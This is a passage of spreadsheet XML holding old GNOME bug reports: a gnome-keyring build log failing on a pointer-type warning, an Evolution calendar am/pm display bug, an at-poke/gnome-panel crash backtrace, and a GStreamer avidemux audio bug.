    <t>gcc -DHAVE_CONFIG_H -I. -I.. -DPREFIX=\/home/build/opt/gnome2\ -DBINDIR=\/home/build/opt/gnome2/bin\ -DLIBEXECDIR=\/home/build/opt/gnome2/libexec\ -DGNOMELOCALEDIR=\/home/build/opt/gnome2/share/locale\ -I.. -I.. -I/home/build/opt/gnome2/include/dbus-1.0 -I/home/build/opt/gnome2/lib/dbus-1.0/include -DGKR_DBUS_MAJOR_VERSION=1 -DGKR_DBUS_MINOR_VERSION=0 -DGKR_DBUS_MICRO_VERSION=2 -I/home/build/opt/gnome2/include/glib-2.0 -I/home/build/opt/gnome2/lib/glib-2.0/include -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wsign-compare -Werror -g -O2 -Wl--allow-shlib-undefined -g -O0 -Wall -Wno-strict-aliasing -Wno-sign-compare -MT gnome-keyring.lo -MD -MP -MF .deps/gnome-keyring.Tpo -c gnome-keyring.c  -fPIC -DPIC -o .libs/gnome-keyring.o
gcc: --allow-shlib-undefined: linker input file unused because linking not done
mv -f .deps/gnome-keyring.Tpo .deps/gnome-keyring.Plo
/bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I.. -DPREFIX=\/home/build/opt/gnome2\ -DBINDIR=\/home/build/opt/gnome2/bin\ -DLIBEXECDIR=\/home/build/opt/gnome2/libexec\ -DGNOMELOCALEDIR=\/home/build/opt/gnome2/share/locale\ -I.. -I.. -I/home/build/opt/gnome2/include/dbus-1.0 -I/home/build/opt/gnome2/lib/dbus-1.0/include   -DGKR_DBUS_MAJOR_VERSION=1 -DGKR_DBUS_MINOR_VERSION=0 -DGKR_DBUS_MICRO_VERSION=2 -I/home/build/opt/gnome2/include/glib-2.0 -I/home/build/opt/gnome2/lib/glib-2.0/include      -Wall    -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes   -Wnested-externs -Wpointer-arith        -Wcast-align -Wsign-compare   -Werror         -g -O2 -Wl--allow-shlib-undefined -g -O0 -Wall -Wno-strict-aliasing -Wno-sign-compare -MT gnome-keyring-memory.lo -MD -MP -MF .deps/gnome-keyring-memory.Tpo -c -o gnome-keyring-memory.lo gnome-keyring-memory.c
 gcc -DHAVE_CONFIG_H -I. -I.. -DPREFIX=\/home/build/opt/gnome2\ -DBINDIR=\/home/build/opt/gnome2/bin\ -DLIBEXECDIR=\/home/build/opt/gnome2/libexec\ -DGNOMELOCALEDIR=\/home/build/opt/gnome2/share/locale\ -I.. -I.. -I/home/build/opt/gnome2/include/dbus-1.0 -I/home/build/opt/gnome2/lib/dbus-1.0/include -DGKR_DBUS_MAJOR_VERSION=1 -DGKR_DBUS_MINOR_VERSION=0 -DGKR_DBUS_MICRO_VERSION=2 -I/home/build/opt/gnome2/include/glib-2.0 -I/home/build/opt/gnome2/lib/glib-2.0/include -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wsign-compare -Werror -g -O2 -Wl--allow-shlib-undefined -g -O0 -Wall -Wno-strict-aliasing -Wno-sign-compare -MT gnome-keyring-memory.lo -MD -MP -MF .deps/gnome-keyring-memory.Tpo -c gnome-keyring-memory.c  -fPIC -DPIC -o .libs/gnome-keyring-memory.o
gcc: --allow-shlib-undefined: linker input file unused because linking not done
mv -f .deps/gnome-keyring-memory.Tpo .deps/gnome-keyring-memory.Plo
/bin/sh ../libtool --tag=CC   --mode=compile gcc -DHAVE_CONFIG_H -I. -I.. -DPREFIX=\/home/build/opt/gnome2\ -DBINDIR=\/home/build/opt/gnome2/bin\ -DLIBEXECDIR=\/home/build/opt/gnome2/libexec\ -DGNOMELOCALEDIR=\/home/build/opt/gnome2/share/locale\ -I.. -I.. -I/home/build/opt/gnome2/include/dbus-1.0 -I/home/build/opt/gnome2/lib/dbus-1.0/include   -DGKR_DBUS_MAJOR_VERSION=1 -DGKR_DBUS_MINOR_VERSION=0 -DGKR_DBUS_MICRO_VERSION=2 -I/home/build/opt/gnome2/include/glib-2.0 -I/home/build/opt/gnome2/lib/glib-2.0/include      -Wall    -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes   -Wnested-externs -Wpointer-arith        -Wcast-align -Wsign-compare   -Werror         -g -O2 -Wl--allow-shlib-undefined -g -O0 -Wall -Wno-strict-aliasing -Wno-sign-compare -MT gnome-keyring-proto.lo -MD -MP -MF .deps/gnome-keyring-proto.Tpo -c -o gnome-keyring-proto.lo gnome-keyring-proto.c
 gcc -DHAVE_CONFIG_H -I. -I.. -DPREFIX=\/home/build/opt/gnome2\ -DBINDIR=\/home/build/opt/gnome2/bin\ -DLIBEXECDIR=\/home/build/opt/gnome2/libexec\ -DGNOMELOCALEDIR=\/home/build/opt/gnome2/share/locale\ -I.. -I.. -I/home/build/opt/gnome2/include/dbus-1.0 -I/home/build/opt/gnome2/lib/dbus-1.0/include -DGKR_DBUS_MAJOR_VERSION=1 -DGKR_DBUS_MINOR_VERSION=0 -DGKR_DBUS_MICRO_VERSION=2 -I/home/build/opt/gnome2/include/glib-2.0 -I/home/build/opt/gnome2/lib/glib-2.0/include -Wall -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes -Wnested-externs -Wpointer-arith -Wcast-align -Wsign-compare -Werror -g -O2 -Wl--allow-shlib-undefined -g -O0 -Wall -Wno-strict-aliasing -Wno-sign-compare -MT gnome-keyring-proto.lo -MD -MP -MF .deps/gnome-keyring-proto.Tpo -c gnome-keyring-proto.c  -fPIC -DPIC -o .libs/gnome-keyring-proto.o
cc1: warnings being treated as errors
gnome-keyring-proto.c: In function 'gkr_proto_decode_prepare_environment':
gnome-keyring-proto.c:1444: warning: passing argument 5 of 'gkr_buffer_get_stringv' from incompatible pointer type
make[3]: *** [gnome-keyring-proto.lo] Error 1
make[3]: Leaving directory `/home/build/svn/gnome2/gnome-keyring/library'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/build/svn/gnome2/gnome-keyring/library'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/build/svn/gnome2/gnome-keyring'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>EVOLUTION-219957</t>
  </si>
  <si>
    <t>Appointment list does not display am/pm when using 12-hour time format</t>
  </si>
  <si>
    <t>Description of Problem:
When you have the calendar set to using a 12 hour clock format the Summary
folder's Appointment list only lists the numbers of the time not whether
an event occurs in the am/pm.
For instance my day today:
   7:30 04 February Swimming
   7:00 04 February Woodworking Class
I have swimming at 7:30am and woodworking at 7pm.</t>
  </si>
  <si>
    <t>rcp</t>
  </si>
  <si>
    <t>AT-POKE-146023</t>
  </si>
  <si>
    <t>AT-POKE</t>
  </si>
  <si>
    <t>there is</t>
  </si>
  <si>
    <t xml:space="preserve">Package: at-poke
Severity: normal
Version: 2.0.6
Synopsis: there is
Bugzilla-Product: at-poke
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.3)
Description:
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-panel'
(no debugging symbols found)...(no debugging symbols found)...[New
Thread 8192 (LWP 1394)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4084dc63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40197ff5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x4084f47e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#5  
#6  0x42028cc1 in kill () from /lib/i686/libc.so.6
#7  0x4084c07d in raise () from /lib/i686/libpthread.so.0
#8  0x4202a019 in abort () from /lib/i686/libc.so.6
#9  0x4089f476 in g_logv () from /usr/lib/libglib-2.0.so.0
#10 0x4089f4b4 in g_log () from /usr/lib/libglib-2.0.so.0
#11 0x40fddb40 in get_class ()
   from /usr/lib/system-tray-applet/libsystem-tray-applet.so
#12 0x40fddbb3 in gtk_obox_size_request ()
   from /usr/lib/system-tray-applet/libsystem-tray-applet.so
#13 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#14 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#15 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#17 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#18 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
#19 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
#20 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#22 0x4030b0c4 in gtk_alignment_size_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#24 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#25 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#26 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#27 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#28 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
#29 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
#30 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
#31 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#32 0x40360ab4 in gtk_event_box_size_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#34 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#35 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#36 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#37 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#38 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
#39 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
#40 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
#41 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#42 0x4048f114 in gtk_window_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#43 0x40218a2b in bonobo_plug_size_request () from
/usr/lib/libbonoboui-2.so.0
#44 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#45 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#46 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#47 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#48 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#49 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
#50 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
#51 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
#52 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
#53 0x4048fd40 in gtk_window_compute_configure_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
#54 0x4048ea3b in gtk_window_show () from /usr/lib/libgtk-x11-2.0.so.0
#55 0x40493629 in gtk_plug_show () from /usr/lib/libgtk-x11-2.0.so.0
#56 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#57 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#58 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#59 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#60 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#61 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#62 0x4047f8d1 in gtk_widget_show () from /usr/lib/libgtk-x11-2.0.so.0
#63 0x40214cfc in impl_Bonobo_Control_getWindowId ()
   from /usr/lib/libbonoboui-2.so.0
#64 0x4063641f in Bonobo_Control_getWindowId () from
/usr/lib/libbonobo-2.so.0
#65 0x402127b6 in bonobo_control_frame_get_remote_window_id ()
   from /usr/lib/libbonoboui-2.so.0
#66 0x402128ba in bonobo_control_frame_get_remote_window ()
   from /usr/lib/libbonoboui-2.so.0
#67 0x4021b75e in bonobo_socket_realize () from
/usr/lib/libbonoboui-2.so.0
#68 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#69 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#70 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#71 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#72 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#73 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#74 0x404801ab in gtk_widget_realize () from
/usr/lib/libgtk-x11-2.0.so.0
#75 0x4047ff4e in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
#76 0x40340f40 in gtk_container_map_child () from
/usr/lib/libgtk-x11-2.0.so.0
#77 0x4030c73c in gtk_bin_forall () from /usr/lib/libgtk-x11-2.0.so.0
#78 0x4033ede4 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
#79 0x40340f8b in gtk_container_map () from
/usr/lib/libgtk-x11-2.0.so.0
#80 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#81 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#82 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#83 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#84 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#85 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#86 0x4047ff0f in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
#87 0x40340f40 in gtk_container_map_child () from
/usr/lib/libgtk-x11-2.0.so.0
#88 0x4030c73c in gtk_bin_forall () from /usr/lib/libgtk-x11-2.0.so.0
#89 0x4033ede4 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
#90 0x40340f8b in gtk_container_map () from
/usr/lib/libgtk-x11-2.0.so.0
#91 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#92 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#93 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#94 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#95 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#96 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#97 0x4047ff0f in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
#98 0x40483be0 in gtk_widget_set_parent () from
/usr/lib/libgtk-x11-2.0.so.0
#99 0x40367fb5 in gtk_fixed_put () from /usr/lib/libgtk-x11-2.0.so.0
#100 0x08061115 in panel_widget_add ()
#101 0x0807ae0f in panel_applet_register ()
#102 0x0809ddd4 in panel_applet_frame_load ()
#103 0x0809db44 in panel_applet_frame_load_from_gconf ()
#104 0x0807a3c0 in panel_applet_load_idle_handler ()
#105 0x40899c83 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#106 0x40896f65 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#107 0x40897f98 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#108 0x408982ad in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
#109 0x40898a1f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#110 0x4039a39f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#111 0x0805aa01 in main ()
#112 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 8192 (LWP 1394)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4084dc63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40197ff5 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4084f47e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x42028cc1 in kill () from /lib/i686/libc.so.6
No symbol table info available.
#7  0x4084c07d in raise () from /lib/i686/libpthread.so.0
No symbol table info available.
#8  0x4202a019 in abort () from /lib/i686/libc.so.6
No symbol table info available.
#9  0x4089f476 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x4089f4b4 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40fddb40 in get_class ()
   from /usr/lib/system-tray-applet/libsystem-tray-applet.so
No symbol table info available.
#12 0x40fddbb3 in gtk_obox_size_request ()
   from /usr/lib/system-tray-applet/libsystem-tray-applet.so
No symbol table info available.
#13 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x4030b0c4 in gtk_alignment_size_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x40360ab4 in gtk_event_box_size_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#42 0x4048f114 in gtk_window_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#43 0x40218a2b in bonobo_plug_size_request () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#44 0x40823870 in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#47 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#48 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#49 0x403df0cc in gtk_signal_emit_by_name () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0x403e0283 in do_size_request () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0x403e061f in _gtk_size_group_compute_requisition ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0x40480abf in gtk_widget_size_request () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0x4048fd40 in gtk_window_compute_configure_request ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#54 0x4048ea3b in gtk_window_show () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0x40493629 in gtk_plug_show () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#56 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#57 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#59 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#60 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#61 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#62 0x4047f8d1 in gtk_widget_show () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#63 0x40214cfc in impl_Bonobo_Control_getWindowId ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#64 0x4063641f in Bonobo_Control_getWindowId () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#65 0x402127b6 in bonobo_control_frame_get_remote_window_id ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#66 0x402128ba in bonobo_control_frame_get_remote_window ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#67 0x4021b75e in bonobo_socket_realize () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#68 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#69 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#70 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#71 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#73 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#74 0x404801ab in gtk_widget_realize () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#75 0x4047ff4e in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#76 0x40340f40 in gtk_container_map_child () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0x4030c73c in gtk_bin_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#78 0x4033ede4 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#79 0x40340f8b in gtk_container_map () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#80 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#81 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#82 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#83 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#84 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#85 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#86 0x4047ff0f in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#87 0x40340f40 in gtk_container_map_child () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#88 0x4030c73c in gtk_bin_forall () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#89 0x4033ede4 in gtk_container_forall () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#90 0x40340f8b in gtk_container_map () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#91 0x40822d01 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#92 0x4080e467 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#93 0x4080e0c0 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#94 0x4082213f in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#95 0x40821888 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#96 0x403defdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#97 0x4047ff0f in gtk_widget_map () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#98 0x40483be0 in gtk_widget_set_parent () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#99 0x40367fb5 in gtk_fixed_put () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#100 0x08061115 in panel_widget_add ()
No symbol table info available.
#101 0x0807ae0f in panel_applet_register ()
No symbol table info available.
#102 0x0809ddd4 in panel_applet_frame_load ()
No symbol table info available.
#103 0x0809db44 in panel_applet_frame_load_from_gconf ()
No symbol table info available.
#104 0x0807a3c0 in panel_applet_load_idle_handler ()
No symbol table info available.
#105 0x40899c83 in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#106 0x40896f65 in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#107 0x40897f98 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#108 0x408982ad in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#109 0x40898a1f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#110 0x4039a39f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#111 0x0805aa01 in main ()
No symbol table info available.
#112 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-08 18:37 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product at-poke.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was lightpal@hotmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>lightpal</t>
  </si>
  <si>
    <t>GSTREAMER-322937</t>
  </si>
  <si>
    <t>Avidemux can't push audio if video pad not attached</t>
  </si>
  <si>
    <t>In other words you can't really play just sound of an AVI file.
